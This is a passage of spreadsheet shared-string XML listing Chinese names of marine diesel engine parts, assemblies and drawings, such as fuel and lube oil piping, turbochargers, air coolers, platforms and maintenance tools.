    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">安全装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">起动器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">起动器箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盘车电机安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">盘车电机安全销                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机互锁布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">联锁装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">换向阀支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支撑部件清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">挡销                                                </t>
  </si>
  <si>
    <t xml:space="preserve">空气启动器管系布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空气马达壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">备件图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气马达布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带链条的安全销                                           </t>
  </si>
  <si>
    <t xml:space="preserve">死点指示器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气启动器隔离                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">集污盘更改                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滤器安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀门                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滑油滤器布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滤芯安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链驱动安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链轮安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆导套安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空气管安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">进口油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">出口油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排泄管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滤板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滑油虑器安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器芯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">组合式冷却器安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">板式冷却器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器底座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">板式冷却器装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">组合板式冷却器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴油冷器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">alpha注油器控制单元                                      </t>
  </si>
  <si>
    <t xml:space="preserve">注油器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平均有效压力调整                                          </t>
  </si>
  <si>
    <t xml:space="preserve">注油器托架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑泵支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器+支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">注油器总成壳体                                           </t>
  </si>
  <si>
    <t xml:space="preserve">注油器总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器驱动轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">注油器驱动支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">偏心杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调节活塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调节活塞总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调整杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑控制单元                                          </t>
  </si>
  <si>
    <t xml:space="preserve">配电板单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">alpha注油器控制单元总成                                    </t>
  </si>
  <si>
    <t xml:space="preserve">气缸注油器接线箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">电子注油器接线                                           </t>
  </si>
  <si>
    <t xml:space="preserve">仪表板安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阿尔法注油器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压块+注油器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">发电机驱动部件清单                                         </t>
  </si>
  <si>
    <t xml:space="preserve">转速传感器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">板清单                                               </t>
  </si>
  <si>
    <t xml:space="preserve">PI41压力表板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">PI40-PI24压力表板                                     </t>
  </si>
  <si>
    <t xml:space="preserve">仪表板壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">重燃油压力表板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力测量管的布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">温度计箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力表板箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表面板支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">注油器电气报警                                           </t>
  </si>
  <si>
    <t xml:space="preserve">错误方向报警离合器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">报警指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器电加热                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制面板列表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阿尔法注油器试验设备                                        </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泵装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵安装                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴安座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">MS.66辅助风机和控制设备                                    </t>
  </si>
  <si>
    <t xml:space="preserve">燃气管安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃气透气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器订货单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器订货说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器订购清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器芯订购清单                                          </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓连接的增压器进口管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">应急风机订购清单                                          </t>
  </si>
  <si>
    <t xml:space="preserve">辅助风机订购清单                                          </t>
  </si>
  <si>
    <t xml:space="preserve">停增压器阀安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器化学清洗安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器喷管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷管端盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">定向管盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗剂混合箱                                         </t>
  </si>
  <si>
    <t xml:space="preserve">喷管拉杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆下部定位                                            </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆上部定位                                            </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆档杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">回转轴滚支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">回转支架、                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器前端导轨                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器后端导轨                                           </t>
  </si>
  <si>
    <t xml:space="preserve">转子清洗工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器前端提升附件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器维修+停转工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器滚轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器道轨                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支承架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀节伸缩工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器拆卸工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器堵转工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器行车轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器气力清洗枪                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器芯子起吊小车                                         </t>
  </si>
  <si>
    <t xml:space="preserve">罗茨鼓风机轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中层支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安装扶手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧中层支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气冷却器框架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">辅助风机导管布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器管系布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器燃气管布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">废气出口布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下层支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后端支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">前端支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">格栅托架支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前端格栅支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧上层顶部支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">后端顶部支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">后端空冷器框架加工                                         </t>
  </si>
  <si>
    <t xml:space="preserve">后端空冷器框架焊接                                         </t>
  </si>
  <si>
    <t xml:space="preserve">吊车轨道                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧中层平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中层平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下层平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴箱内部平台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱平台                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱走台支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座平台                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铜轴环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">平台衬口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器+排气集管座                                       </t>
  </si>
  <si>
    <t xml:space="preserve">格栅布置更改                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平台照明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">辅助风机安装-链条箱                                        </t>
  </si>
  <si>
    <t xml:space="preserve">辅助风机布置在气缸                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧走台安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱平台                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱台阶                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推杆轨道防护装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">平台轨道防护装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">停机泄放阀安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动滑块布置安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">停机泄放阀座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">梯子布置图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">踏步                                                </t>
  </si>
  <si>
    <t xml:space="preserve">特殊扶手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧平台布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧和后端平台布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器/涡轮增压器平台布置                                     </t>
  </si>
  <si>
    <t xml:space="preserve">下层平台-顶视图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">平台-顶视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧中层支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧支架布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平台布置前端视图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">上层支架和管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">中层支架和管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">下层支架和管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平台布置后端视图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧上层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧中层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧下层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧俯视图/端视图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧平台布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支架工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中层支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下层支架布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧支架布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后端支架布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">顶部走台布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后侧俯视图/端视图                                         </t>
  </si>
  <si>
    <t xml:space="preserve">布置                                                </t>
  </si>
  <si>
    <t xml:space="preserve">底层平台布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带扶手的支架框架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带扶手的支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前端走台支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后端托架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">附件                                                </t>
  </si>
  <si>
    <t xml:space="preserve">踏板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带扶手的梯子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定夹                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架零件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">报警系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承（止推轴承）报警                                      </t>
  </si>
  <si>
    <t xml:space="preserve">壳体总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">报警支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压联结                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管系装配表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸平面管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力块提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力块止动块用液压拉伸器                                      </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承用液压拉伸器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">调频轮用液压拉伸器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油进口管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管系进出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">外部管接口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-管子布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸管件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">前管件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">后管件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">纵管件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主燃油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">法兰一览表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧主管安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油进油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油主管进口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油回油总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管支撑固定                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活动支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主燃油出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高压管道布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器冷却油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管出口阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缓冲器泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄放盒安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱泄放管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵加热                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵加热管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油伞形密封回油                                          </t>
  </si>
  <si>
    <t xml:space="preserve">高压燃油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高压双璧管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">软管总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">高压管绝缘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄放主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油伞形密封回油主管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">伞形密封回油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">NC阀+缓冲器泄放                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵泄放                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气进口到燃油泵                                          </t>
  </si>
  <si>
    <t xml:space="preserve">高压管泄放检查                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵泄漏系统                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油调节阀布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油主管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔板支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油调节阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高压管安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸支架安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油分配管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油分配管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄放管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油合流管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机泄放                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油进口滤器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">过滤器出口柴油机进口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">燃油供应管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油过滤器支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">分支管安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器的2通球阀                                         </t>
  </si>
  <si>
    <t xml:space="preserve">泄油箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">环形膨胀接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀接头夹环安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主管装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸截面主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油主管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷射保护管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷射直管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">保护软管插座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柔性软管盖总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">报警软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油透气柜                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油漏斗                                              </t>
  </si>
  <si>
    <t xml:space="preserve">漏斗                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸部分管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前端管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油分流管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵进油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主泵燃油进口管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滤器支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油过滤器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄放盒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">可调弯管接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力测量阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀空气管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸1起吊装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升装置布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">横隔膜安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">超速控制布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵归零                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调零设定管泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">报警系统管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">提升装置管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">报警系统装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸控制空气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后端控制空气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">高压管防护                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高压油管切削+研磨工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油管和管座切削工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">分配块座切削工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管磨削工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">高压油管销钉扳手                                          </t>
  </si>
  <si>
    <t xml:space="preserve">高压管压力测试工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油零件清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">系统油进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">系统油进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承滑油管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧各管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油阀+执行器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">三通接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑油总管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑油进油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油总管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油弯管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发电机管子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">传送齿轮润滑油管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">控制侧柴油机管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧柴油机管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机管总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座润滑油管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-减震装置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器润滑油主管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">驱动泵滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">输出端润滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-力矩补偿器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-轴向减振器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-扭矩平衡装置                                       </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带螺栓连接法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵润滑油进口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">备用执行器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压油清洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌阀滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体泄放总管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧顶层走台管系                                         </t>
  </si>
  <si>
    <t xml:space="preserve">填料函泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮箱管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-扩压管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管泄放管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座操纵侧泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机座排气侧泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油进口总管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">填料箱+机座泄放管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">各泄放管支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管出口，润滑齿轮                                       </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油出口总管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">填料函泄放总管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放总管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座泄放管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座泄放管支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压、润滑油泄放                                          </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧压力                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌压力                                              </t>
  </si>
  <si>
    <t xml:space="preserve">出口系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">各种泄放管支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压油泵                                              </t>
  </si>
  <si>
    <t xml:space="preserve">到滑油冷却器的膜片阀出口                                      </t>
  </si>
  <si>
    <t xml:space="preserve">伞形密封泄放                                            </t>
  </si>
  <si>
